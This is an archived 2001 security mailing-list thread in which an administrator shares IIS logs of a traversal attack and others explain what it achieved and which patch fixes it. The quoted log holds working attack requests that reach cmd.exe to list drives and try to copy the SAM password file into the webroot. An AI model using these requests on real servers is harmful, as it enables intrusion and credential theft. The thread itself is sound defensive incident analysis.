Re: IIS Unicode attack decode

[ROBERT DEMAIN <rdemain () RM COM>]

Thanks for the responses,

The server was patched as soon as the attack was seen (see gary's link for
the relevant patch).  It should have been patched anyway, need say no more
about that.  The log file is what was seen pre-patch and as Gary says below,
the attacker had plenty of options open to him and his analysis of what the
attecker could and couldn't do is correct.
Just another example of the importance of keeping up to date i guess.  One
more thing, whilst investigating this i came accross
http://grc.com/pw/patchwork.htm which is worth a look...

Rob
-----Original Message-----
From: Portnoy, Gary
To: ROBERT DEMAIN
Cc: 'INCIDENTS () SECURITYFOCUS COM'
Sent: 20/03/01 17:57
Subject: RE: IIS Unicode attack decode

Robert,

This indeed is the IIS Unicode exploit.  Looks like an automatic tool
based
on the quick succession of the requests initially, but then they slow
down,
and the attacker has to stop and think, as things don't go exactly as he
planned.  Notice that some GET's returned the code of 200, meaning he
was
able to successfully obtain the directory structure of your c and d
drives,
as well as c:\winnt and some others.  You also have an executable
_vti_bin
directory which signifies to the attacker that you have FrontPage
installed.
He could exploit some FrontPage vulnerabilities.  You are right, he
wasn't
able to obtain sam._ from the repair directory due to permissions, but
from
what it looks like your webroot is on c drive, so he/she can now run any
executable in winnt directory, unless IUSR_computername is denied access
to
them.  That's all they need to turn your computer into a warez site as
was
detailed in postings by Ron Grove from 2/24/01 to the incidents list.
That
generated quite a discussion, so check it out...

You probably need to load MS patch Q277873
http://www.microsoft.com/technet/security/bulletin/MS00-086.asp

-Gary-

Gary Portnoy
Network Administrator
gportnoy () belenosinc com

PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C


> -----Original Message-----
> From: ROBERT DEMAIN [mailto:rdemain () RM COM]
> Sent: Tuesday, March 20, 2001 9:56 AM
> To: INCIDENTS () SECURITYFOCUS COM
> Subject: IIS Unicode attack decode
>
>
> Hello All,
>
> Recently i've been seeing quite a few attempts from the same
> russian IP
> trying to send unicode commands to a web server.  These
> attacks were picked
> up by an IDS.  Below are extracts from the log file on the
> web server (see
> below)
>
> My understanding of what has happened here is as follows:
> -attacker tries a few attempts at doing a dir listing of c: and d:
> -attacker tries to copy important stuff from the \repair directory to
> c:\inetpub\wwwroot (most unfriendly)
> -attacker tries to copy bitmap (Blue%20Lace%2016.bmp) - not
> sure what this
> is about
>
> Putting it all together it seems the attacker tried to use
> the iis4 and 5
> unicode exploit to copy the sam file to a place where
> he/she/it thought they
> could get it from (on this server c:\inetpub\wwwroot is not
> the default web
> site or anything, but i believe it is on a default iis install).  This
> failed for two main reasons; 1. the iusr_servername account
> (which is the
> user account this exploit can run as - correct me if i'm
> wrong) does not
> have permissions on \repair 2. the copy of the file to
> c:\inetpub\wwwroot
> would also fail as iusr_servername would not have the rights.
>
> Anyone have any comments on this?  Anyone else seen activity
> like this?
>
> Regards
>
> Rob
>
>
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD
> /Default.htm -
> 200 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
> /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
> /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
> Mozilla/3.0+(compatible)
> 2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\winnt\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\winnt\repair\
> 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\Inetpub\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\Inetpub\AdminScripts\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
> 2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+dir+c:\Inetpub\wwwroot\ 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
>
>
> Standard Disclaimer: This message is confidential.  You
> should not copy it
> or disclose its contents to anyone.  You may use and apply
> the information
> only for the intended purpose.  Internet communications are
> not secure and
> therefore RM does not accept legal responsibility for the
> contents of this
> message.  Any views or opinions presented are only those of
> the author and
> not those of RM.  If this email has come to you in error
> please delete it
> and any attachments.  Please note that RM may intercept incoming and
> outgoing e-mail communications.


Standard Disclaimer: This message is confidential.  You should not copy it
or disclose its contents to anyone.  You may use and apply the information
only for the intended purpose.  Internet communications are not secure and
therefore RM does not accept legal responsibility for the contents of this
message.  Any views or opinions presented are only those of the author and
not those of RM.  If this email has come to you in error please delete it
and any attachments.  Please note that RM may intercept incoming and
outgoing e-mail communications.